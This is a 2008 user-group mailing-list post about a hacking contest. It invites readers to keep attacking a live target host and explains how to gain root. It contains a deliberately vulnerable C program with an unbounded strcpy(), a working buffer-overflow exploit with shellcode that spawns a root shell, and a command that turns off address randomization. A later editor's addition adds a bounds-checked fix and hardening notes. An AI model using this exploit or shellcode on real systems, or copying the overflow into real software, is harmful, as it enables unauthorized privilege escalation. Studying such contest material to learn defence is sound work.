HackFest Series: FLAGS!

Lisa Kachold lisakachold at obnosis.com
Sat Dec 13 16:49:37 MST 2008


None got root yet!



We are leaving the target up available at http://24.251.219.96:8088

It's still open for encroachment through the weekend!

HackFest results:
http://plug.phoenix.az.us/comment/edit/126

Kudos to:
PAVLOS KAIRIS TOOK the first SSH FLAG as nobody
RW who followed by getting mysql access via SSH
DrRabbit (Tuna) for his Windows Work OffFest!

Here's how to escalate to root via overflowing the buffer:

I turned off kernel protection for Linux kernels (a hole in kernels younger than 2.6-18):
echo 0 > /proc/sys/kernel/randomize_va_space

So you should be able to exploit this code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   // strcpy()

// 1024 bytes buffer
// 4 bytes to overwrite ebp
// 4 bytes to overwrite eip
// 1032 bytes :)

void viewer(char *string)
{
    char buffer[1024];

    strcpy(buffer, string);   // unbounded copy: this is the overflow

    printf("You have entered: %s\n", buffer);

    return;
}

int main(int argc, char *argv[])
{
    if(argc < 2)
    {
        printf("%s <something> \n", argv[0]);
        return 0;
    }

    viewer(argv[1]);
    return 0;
}


---cut here--end

This works:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   // execl()

#define NOP 0x90 // defining the NOP
#define VUL_FILE "./vuln"

char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63"
"\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e" // our shellcode
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53"
"\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

unsigned long get_sp(void)
{
    unsigned long sp;
    __asm__("movl %%esp, %0" : "=r"(sp)); // this function returns the stack pointer address, hopefully where
    return sp;                            // our shellcode is stored.
}

int main(int argc, char *argv[], char **envp)
{
    int buff = 1032;               // size of the vuln buffer.
    unsigned long addr = get_sp(); // addr of shellcode.
    char *ptr;                     // used for adding nops etc.
    if(argc > 1)
        buff = atoi(argv[1]);      // if the user supplies a size, use this instead.

    if((buff % 4) != 0)               // if the size is not a mem addr (divisible by 4)
        buff = buff + 4 - (buff % 4); // add 4 to it, take away the remainder (makes it divisible by 4)

    if((ptr = (char *)malloc(buff)) == NULL) // check to see you allocated enough memory.
    {
        printf("Error allocating memory.\n");
        exit(0);
    }
    memset(ptr, NOP, buff); // fill the buffer with NOPS making our chances higher.
    memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode)); // store the shellcode in the buffer.
    *(long *)&ptr[buff - 4] = addr; // make eip point to our shellcode.
    execl(VUL_FILE, "exploit example1", ptr, NULL); // execute the vuln program with our NOPS&shellcode in the buffer.
    printf("Addr: 0x%lx\n", addr); // only reached if execl() fails
    return 0;
}

---end--

Easy as pi, right?

get it?

www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |  (503)754-4452
Catch the January PLUG HackFest!   Kristy Westphal, CSO for the AZ Department of Economic Security,
will provide a one hour presentation on forensics 1/10/09 Noon at UAT.edu.
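Added here as an editor's example, not code from Lisa's post: the same viewer() with the strcpy() replaced by a length-checked copy, so an argument longer than the 1024-byte buffer is rejected instead of reaching the saved ebp and eip the post's comments add up to 1032 bytes. The names bounded_copy, viewer_checked and try_length are mine, and the 'A'-filled probe input is constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024   /* same 1024-byte stack buffer as the post's viewer() */

/* Copy `string` into `dst` only if it fits, NUL included.
 * Returns 0 when copied, -1 when the input is too long (nothing written).
 * The original strcpy() has no such check, which is how 1032 bytes reach
 * the saved ebp and eip that sit just past the buffer on the stack. */
int bounded_copy(char *dst, size_t dst_size, const char *string)
{
    size_t len = strlen(string);
    if (len >= dst_size)
        return -1;          /* would overflow: refuse rather than truncate silently */
    memcpy(dst, string, len + 1);
    return 0;
}

/* Hardened viewer(): same buffer, same output, but the copy is checked first. */
int viewer_checked(const char *string)
{
    char buffer[BUF_SIZE];

    if (bounded_copy(buffer, sizeof buffer, string) != 0) {
        fprintf(stderr, "input too long (%zu bytes, max %zu)\n",
                strlen(string), sizeof buffer - 1);
        return -1;
    }
    printf("You have entered: %s\n", buffer);
    return 0;
}

/* Feed viewer_checked() a constructed argument of n 'A' bytes (n < 2048),
 * e.g. the 1032 bytes the post's comments add up to. */
int try_length(size_t n)
{
    static char probe[2048];
    if (n >= sizeof probe)
        return -1;
    memset(probe, 'A', n);
    probe[n] = '\0';
    return viewer_checked(probe);
}
```

On the defensive side, building the original vuln with gcc's -fstack-protector and leaving randomize_va_space at its default of 2 means the same 1032-byte input aborts on a clobbered canary or lands on an unpredictable stack address.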


